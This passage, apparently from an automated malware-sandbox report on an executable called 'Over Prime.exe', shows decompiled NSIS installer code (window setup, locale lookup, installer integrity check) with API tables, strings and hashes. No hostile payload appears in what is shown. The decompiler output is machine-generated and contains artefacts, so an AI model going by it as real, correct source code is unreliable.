													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136) {
							_t146 =  *0x433ed8 - _t136; // 0xf0080
							if(_t146 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x42f268 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t127, 4);
						goto L8;
					}
				}
			}

0x00403fa5
0x00403fac
0x00404113
0x00404117
0x0040411b
0x0040411d
0x00404122
0x0040412d
0x00404138
0x0040413d
0x0040413f
0x00404141
0x00404144
0x00404149
0x00404157
0x00404164
0x0040416b
0x0040416b
0x0040416c
0x0040416c
0x00404171
0x00404177
0x0040417e
0x00404184
0x00404186
0x004041c6
0x004041cb
0x004041d0
0x004041d0
0x004041d5
0x004041de
0x004041e0
0x004041e5
0x004041eb
0x004041ef
0x004041ef
0x004041f4
0x004041fa
0x00000000
0x00000000
0x00404205
0x0040420b
0x00000000
0x00000000
0x00404214
0x0040421c
0x00404221
0x00404224
0x0040422a
0x0040422f
0x00404232
0x00404238
0x0040423d
0x00404240
0x00404246
0x0040424e
0x00404254
0x0040425a
0x0040425e
0x00404265
0x00404265
0x00404265
0x0040426f
0x00404281
0x0040428d
0x00404292
0x0040429c
0x004042a2
0x004042a4
0x004042a9
0x004042a6
0x004042a6
0x004042a6
0x004042b9
0x004042d1
0x004042d3
0x004042d9
0x004042ee
0x004042db
0x004042e4
0x004042e6
0x004042e6
0x004042f4
0x00404305
0x0040431b
0x00404322
0x00404328
0x0040432c
0x00404331
0x00404333
0x00000000
0x00404339
0x00404339
0x0040433b
0x00000000
0x00000000
0x00404341
0x00404345
0x0040436a
0x00404370
0x00404376
0x00404378
0x00000000
0x00000000
0x0040439e
0x004043a4
0x004043a6
0x004043ab
0x00000000
0x00000000
0x004043b1
0x004043b4
0x004043b7
0x004043ce
0x004043da
0x004043f3
0x004043f9
0x004043fd
0x00404402
0x00404408
0x00000000
0x00000000
0x00404412
0x0040441d
0x00000000
0x0040441d
0x00404347
0x0040434d
0x00000000
0x00000000
0x00404353
0x00404359
0x00000000
0x00000000
0x00000000
0x0040435f
0x00404333
0x0040442a
0x00404436
0x0040443d
0x00000000
0x00404188
0x00404188
0x0040418b
0x004041be
0x004041be
0x004041c0
0x00000000
0x00000000
0x00000000
0x004041c0
0x0040418d
0x00404191
0x00404196
0x00404198
0x00000000
0x00000000
0x004041a8
0x004041b0
0x00000000
0x004041b6
0x00403fbe
0x00403fbe
0x00403fc2
0x00403fc7
0x00403fd6
0x00403fd6
0x00403fdc
0x00403fe3
0x00404027
0x0040402d
0x00404046
0x00404049
0x0040405c
0x00404062
0x00404100
0x00000000
0x00404109
0x00404068
0x00404073
0x00404075
0x00404077
0x00404096
0x00404096
0x00404099
0x0040409e
0x004040a1
0x004040b1
0x004040b2
0x004040b4
0x004040ea
0x004040fa
0x00000000
0x004040fa
0x004040b6
0x004040bc
0x004040d5
0x004040da
0x004040dc
0x00000000
0x00000000
0x004040de
0x004040ca
0x004040ca
0x004040cc
0x004040cc
0x00000000
0x004040cc
0x004040bf
0x004040c4
0x00000000
0x004040c4
0x004040a3
0x004040a9
0x00000000
0x00000000
0x004040ab
0x00000000
0x004040ab
0x0040409b
0x00000000
0x0040409b
0x00404081
0x00404088
0x0040408e
0x00404090
0x00404466
0x00000000
0x00404466
0x00000000
0x00404090
0x0040404e
0x00000000
0x00404056
0x00404035
0x0040403b
0x00404443
0x00404449
0x0040444b
0x00404451
0x00404456
0x0040445c
0x0040445c
0x00404451
0x00000000
0x00404449
0x00403fea
0x00403ff6
0x00403fff
0x00000000
0x0040401e
0x00404021
0x00000000
0x00404021
0x00403fff

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t41 =  *0x433ee0; // 0x0
							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403bf2
0x00403bfb
0x00403c02
0x00403c04
0x00403c18
0x00403c2a
0x00403c33
0x00403c3c
0x00403c43
0x00403c48
0x00403c4f
0x00403c62
0x00403c62
0x00403c6d
0x00403c06
0x00403c11
0x00403c11
0x00403c72
0x00403c7c
0x00403c85
0x00403c8a
0x00403c9b
0x00403d2d
0x00403d35
0x00403d3e
0x00403d3e
0x00403d54
0x00403d5a
0x00403d68
0x00403de9
0x00403df1
0x00403dfb
0x00403e00
0x00403e06
0x00403e90
0x00403e95
0x00403e97
0x00403eb3
0x00000000
0x00403eb3
0x00403e99
0x00403e9f
0x00403ea7
0x00403ea7
0x00000000
0x00403e9f
0x00403e14
0x00403e1f
0x00403e24
0x00403e26
0x00403e2d
0x00403e2d
0x00403e38
0x00403e40
0x00403e42
0x00403e44
0x00403e4d
0x00403e50
0x00403e56
0x00403e56
0x00403e5c
0x00403e75
0x00403e86
0x00000000
0x00403e8b
0x00403df3
0x00403df5
0x00000000
0x00403d6a
0x00403d6a
0x00403d76
0x00403d80
0x00403d86
0x00403d8b
0x00403d9a
0x00403eb8
0x00403eb8
0x00000000
0x00403eb8
0x00403da9
0x00403de4
0x00000000
0x00403de4
0x00403ca1
0x00403ca1
0x00403ca4
0x00403ca6
0x00000000
0x00000000
0x00403cb4
0x00403cc6
0x00403ccb
0x00403cd4
0x00000000
0x00000000
0x00403cda
0x00403cdc
0x00403ce9
0x00403ce9
0x00403cf2
0x00403cf8
0x00403d20
0x00403d28
0x00000000
0x00403d0a
0x00403d0b
0x00403d14
0x00403d1a
0x00403d1b
0x00000000
0x00403d1b
0x00403d16
0x00403d18
0x00000000
0x00000000
0x00000000
0x00403d18
0x00403cf8

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75B53420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

.DEFAULT\Control Panel\International, xrefs: 00403C58
_Nb, xrefs: 00403D70, 00403DD8
1033, xrefs: 00403C0C, 00403C68
RichEdit20W, xrefs: 00403E38, 00403E3E
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
RichEdit, xrefs: 00403E47
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
C:\Users\user\AppData\Local\Temp, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
.exe, xrefs: 00403CFA
RichEd20, xrefs: 00403E1A
RichEd32, xrefs: 00403E28

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1862882193
Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\Over Prime.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Over Prime.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434f14;
						if( *0x434f14 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41ea18; // 0x52c3a
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434f14 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42aa24; // 0x52c3e
						if(__eflags < 0) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00403085
0x00403088
0x0040308b
0x0040308e
0x00403094
0x004030a5
0x004030aa
0x004030bd
0x004030c2
0x004030c5
0x004030cb
0x00000000
0x004030cd
0x004030de
0x004030ef
0x004030f6
0x004030fc
0x004030fe
0x00403103
0x00403105
0x004031f0
0x004031f2
0x004031f7
0x004031fe
0x00000000
0x00000000
0x00403200
0x00403203
0x00403227
0x00403227
0x0040322c
0x00403232
0x0040323d
0x00403242
0x00403242
0x00403245
0x00403246
0x00403247
0x00403249
0x0040324e
0x00403251
0x00403264
0x00403268
0x00403270
0x00403275
0x00403277
0x00403277
0x00403277
0x0040327f
0x0040327f
0x00403282
0x00403283
0x00403283
0x00403286
0x00403288
0x00403288
0x00403288
0x00403292
0x00403298
0x004032a6
0x004032ab
0x00000000
0x004032ab
0x00000000
0x00403251
0x0040320b
0x00403216
0x0040321b
0x0040321d
0x00000000
0x00000000
0x00403222
0x00403225
0x00000000
0x00000000
0x00000000
0x0040310b
0x00403110
0x00403115
0x00403119
0x00403120
0x00403125
0x00403127
0x00403129
0x00403129
0x0040312d
0x00403132
0x00403134
0x0040325c
0x00403253
0x00000000
0x00403253
0x0040313a
0x00403141
0x004031bd
0x004031c1
0x004031c5
0x004031ca
0x00000000
0x004031c1
0x0040314a
0x0040314f
0x00403152
0x00403157
0x00000000
0x00000000
0x00403159
0x00403160
0x00000000
0x00000000
0x00403162
0x00403169
0x00000000
0x00000000
0x0040316b
0x00403172
0x00000000
0x00000000
0x00403174
0x0040317b
0x00000000
0x00000000
0x0040317d
0x00403183
0x0040318c
0x00403192
0x00403195
0x00403197
0x0040319d
0x00000000
0x00000000
0x004031a3
0x004031a7
0x004031af
0x004031af
0x004031b2
0x004031b5
0x004031b7
0x004031b9
0x004031b9
0x00000000
0x004031b7
0x004031a9
0x004031ad
0x00000000
0x00000000
0x00000000
0x004031cb
0x004031cb
0x004031d1
0x004031dd
0x004031dd
0x004031e0
0x004031e6
0x004031e6
0x004031e6
0x004031ee
0x004031ee
0x00000000
0x004031ee

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Over Prime.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Over Prime.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\Over Prime.exe,C:\Users\user\Desktop\Over Prime.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
Null, xrefs: 00403174
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
}8@, xrefs: 00403227, 00403242
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Error launching installer, xrefs: 004030CD
C:\Users\user\Desktop\Over Prime.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Inst, xrefs: 00403162

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Over Prime.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-994003060
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
